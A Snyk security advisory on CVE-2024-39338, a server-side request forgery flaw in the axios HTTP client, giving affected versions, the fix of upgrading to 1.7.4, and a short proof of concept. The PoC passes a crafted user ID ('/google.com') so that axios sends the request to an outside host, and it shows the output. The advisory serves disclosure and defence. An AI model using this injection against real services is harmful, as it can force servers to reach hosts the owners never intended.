Server-side Request Forgery (SSRF) Affecting axios package, versions >=1.3.2 <1.7.4
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.08% (37th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-AXIOS-7361793
- published 11 Aug 2024
- disclosed 24 Jun 2024
- credit jeffhacks
Introduced: 24 Jun 2024
CVE-2024-39338 Open this link in a new tabHow to fix?
Upgrade axios
to version 1.7.4 or higher.
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) through unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. An attacker can manipulate the server to make unauthorized requests by exploiting this behavior.
PoC
const axios = require('axios');
this.axios = axios.create({
baseURL: 'https://userapi.example.com',
});
//userId = '12345';
userId = '/google.com'
this.axios.get(`/${userId}`).then(function (response) {
console.log(`config.baseURL: ${response.config.baseURL}`);
console.log(`config.method: ${response.config.method}`);
console.log(`config.url: ${response.config.url}`);
console.log(`res.responseUrl: ${response.request.res.responseUrl}`);
});
Output:
config.baseURL: https://userapi.example.com
config.method: get
config.url: //google.com
res.responseUrl: http://www.google.com/